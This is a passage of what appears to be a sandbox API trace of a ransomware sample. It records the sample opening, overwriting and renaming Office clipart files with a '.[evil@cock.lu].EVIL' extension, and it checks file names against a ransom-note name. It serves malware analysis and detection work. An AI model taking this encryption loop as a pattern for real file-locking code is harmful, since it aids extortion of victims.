Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099190.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099190.jpg.[evil@cock.lu].evil")) returned 1 [0130.957] ??_V@YAXPEAX@Z () returned 0x1 [0130.960] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099190.JPG", dwFileAttributes=0x200) returned 0 [0130.960] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.960] wcsstr (_Str="J0099191.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.960] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099191.JPG") returned 69 [0130.960] wcscmp (_String1="J0099191.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.960] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099191.JPG") returned 0x0 [0130.960] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099191.JPG") returned 0x45 [0130.960] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099191.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099191.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.962] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xf39f, lpOverlapped=0x0) returned 1 [0130.970] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.970] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.970] _errno () returned 0x84b1160840 [0130.970] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.970] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xf3a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xf3a0, lpOverlapped=0x0) returned 1 [0130.970] CloseHandle (hObject=0x1a8) returned 1 [0130.970] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099191.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.971] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.971] __uncaught_exception () returned 0x84b1160800 [0130.971] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.971] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099191.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099191.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099191.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099191.jpg.[evil@cock.lu].evil")) returned 1 [0130.972] ??_V@YAXPEAX@Z () returned 0x1 [0130.974] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099191.JPG", dwFileAttributes=0x200) returned 0 [0130.975] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.975] wcsstr (_Str="J0099192.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.975] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099192.GIF") returned 69 [0130.975] wcscmp (_String1="J0099192.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.975] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099192.GIF") returned 0x0 [0130.975] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099192.GIF") returned 0x45 [0130.975] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099192.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099192.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.977] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x462c, lpOverlapped=0x0) returned 1 [0131.026] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.026] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.026] _errno () returned 0x84b1160840 [0131.027] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.027] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x4640, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4640, lpOverlapped=0x0) returned 1 [0131.027] CloseHandle (hObject=0x1a8) returned 1 [0131.027] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099192.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0131.027] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0131.027] __uncaught_exception () returned 0x84b1160800 [0131.027] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0131.027] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099192.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099192.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099192.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099192.gif.[evil@cock.lu].evil")) returned 1 [0131.028] ??_V@YAXPEAX@Z () returned 0x1 [0131.031] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099192.GIF", dwFileAttributes=0x200) returned 0 [0131.031] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0131.031] wcsstr (_Str="J0099193.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0131.031] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099193.GIF") returned 69 [0131.031] wcscmp (_String1="J0099193.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0131.031] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099193.GIF") returned 0x0 [0131.031] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099193.GIF") returned 0x45 [0131.031] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099193.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099193.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0131.033] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8ada, lpOverlapped=0x0) returned 1 [0131.081] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.081] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.081] _errno () returned 0x84b1160840 [0131.081] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.081] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x8ae0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8ae0, lpOverlapped=0x0) returned 1 [0131.081] CloseHandle (hObject=0x1a8) returned 1 [0131.081] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099193.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0131.081] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0131.082] __uncaught_exception () returned 0x84b1160800 [0131.082] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0131.082] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099193.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099193.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099193.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099193.gif.[evil@cock.lu].evil")) returned 1 [0131.083] ??_V@YAXPEAX@Z () returned 0x1 [0131.085] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099193.GIF", dwFileAttributes=0x200) returned 0 [0131.085] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0131.085] wcsstr (_Str="J0099194.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0131.085] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099194.GIF") returned 69 [0131.085] wcscmp (_String1="J0099194.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0131.085] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099194.GIF") returned 0x0 [0131.086] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099194.GIF") returned 0x45 [0131.086] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099194.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099194.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0131.087] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x62b1, lpOverlapped=0x0) returned 1 [0131.095] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.095] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.095] _errno () returned 0x84b1160840 [0131.095] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.095] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x62c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x62c0, lpOverlapped=0x0) returned 1 [0131.095] CloseHandle (hObject=0x1a8) returned 1 [0131.098] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099194.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0131.098] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0131.098] __uncaught_exception () returned 0x84b1160800 [0131.098] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0131.098] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099194.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099194.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099194.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099194.gif.[evil@cock.lu].evil")) returned 1 [0131.099] ??_V@YAXPEAX@Z () returned 0x1 [0131.101] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099194.GIF", dwFileAttributes=0x200) returned 0 [0131.102] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0131.102] wcsstr (_Str="J0099195.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0131.102] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099195.GIF") returned 69 [0131.102] wcscmp (_String1="J0099195.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0131.102] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099195.GIF") returned 0x0 [0131.102] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099195.GIF") returned 0x45 [0131.102] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099195.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099195.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0131.104] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4dd3, lpOverlapped=0x0) returned 1 [0131.178] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.178] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.178] _errno () returned 0x84b1160840 [0131.178] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.178] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4de0, lpOverlapped=0x0) returned 1 [0131.178] CloseHandle (hObject=0x1a8) returned 1 [0131.179] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099195.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0131.179] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0131.179] __uncaught_exception () returned 0x84b1160800 [0131.179] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0131.179] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099195.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099195.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099195.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099195.gif.[evil@cock.lu].evil")) returned 1 [0131.180] ??_V@YAXPEAX@Z () returned 0x1 [0131.183] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099195.GIF", dwFileAttributes=0x200) returned 0 [0131.183] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0131.183] wcsstr (_Str="J0099196.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0131.183] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099196.GIF") returned 69 [0131.183] wcscmp (_String1="J0099196.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0131.183] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099196.GIF") returned 0x0 [0131.183] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099196.GIF") returned 0x45 [0131.183] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099196.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099196.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0131.198] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3801, lpOverlapped=0x0) returned 1 [0131.206] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.207] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.207] _errno () returned 0x84b1160840 [0131.207] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.207] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x3820, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3820, lpOverlapped=0x0) returned 1 [0131.207] CloseHandle (hObject=0x1a8) returned 1 [0131.207] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099196.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0131.207] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0131.207] __uncaught_exception () returned 0x84b1160800 [0131.207] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0131.207] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099196.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099196.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099196.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099196.gif.[evil@cock.lu].evil")) returned 1 [0131.208] ??_V@YAXPEAX@Z () returned 0x1 [0131.211] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099196.GIF", dwFileAttributes=0x200) returned 0 [0131.211] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0131.211] wcsstr (_Str="J0099197.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0131.211] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099197.GIF") returned 69 [0131.211] wcscmp (_String1="J0099197.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0131.211] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099197.GIF") returned 0x0 [0131.211] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099197.GIF") returned 0x45 [0131.211] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099197.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099197.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0131.216] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2a92, lpOverlapped=0x0) returned 1 [0131.248] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.248] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.248] _errno () returned 0x84b1160840 [0131.248] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.248] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x2aa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2aa0, lpOverlapped=0x0) returned 1 [0131.248] CloseHandle (hObject=0x1a8) returned 1 [0131.248] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099197.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0131.249] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0131.249] __uncaught_exception () returned 0x84b1160800 [0131.249] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0131.249] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099197.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099197.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099197.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099197.gif.[evil@cock.lu].evil")) returned 1 [0131.250] ??_V@YAXPEAX@Z () returned 0x1 [0131.252] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099197.GIF", dwFileAttributes=0x200) returned 0 [0131.253] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0131.253] wcsstr (_Str="J0099198.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0131.253] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099198.GIF") returned 69 [0131.253] wcscmp (_String1="J0099198.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0131.253] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099198.GIF") returned 0x0 [0131.253] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099198.GIF") returned 0x45 [0131.253] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099198.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099198.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0131.255] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x148b, lpOverlapped=0x0) returned 1 [0131.294] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.295] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.295] _errno () returned 0x84b1160840 [0131.295] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.295] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x14a0, lpOverlapped=0x0) returned 1 [0131.295] CloseHandle (hObject=0x1a8) returned 1 [0131.295] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099198.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0131.295] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0131.295] __uncaught_exception () returned 0x84b1160800 [0131.295] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0131.295] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099198.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099198.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099198.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099198.gif.[evil@cock.lu].evil")) returned 1 [0131.296] ??_V@YAXPEAX@Z () returned 0x1 [0131.299] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099198.GIF", dwFileAttributes=0x200) returned 0 [0131.299] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0131.299] wcsstr (_Str="J0099199.GIF", 